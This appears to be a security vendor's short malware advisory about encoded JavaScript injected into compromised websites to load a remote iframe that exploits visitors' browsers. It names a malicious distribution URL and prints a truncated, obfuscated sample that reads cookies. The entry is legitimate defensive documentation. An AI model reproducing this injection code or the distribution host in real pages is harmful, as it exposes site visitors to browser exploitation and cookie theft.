Description:
A malicious and encoded javascript was found. It used multiple encoding methods to hide a remote iframe include from a compromised web site. All in attempt to exploit the browser of anyone visiting the site.
Note that in this case the javascript files get compromised with the malicious code.
Affecting: Any web site. Often on outdated WordPress, Joomla and osCommerce sites.
Clean up: You can also sign up with us and let our team remove the malware for you.
Loads malware from multiple sources:
http://adimgsn10.co.in/smb
Malware dump (sample of malware):
var l_lpM="x75x73x65rix64A0x3817FB2x35";var
ptwoAN8="25";var Or5PDn=1;var OE4nLI;function BUkA(OIAQ5){var MaEb1=document.cookie;if(!MaEb1){return
null;}MaEb1=MaEb1.replace(/s/g,"");var U...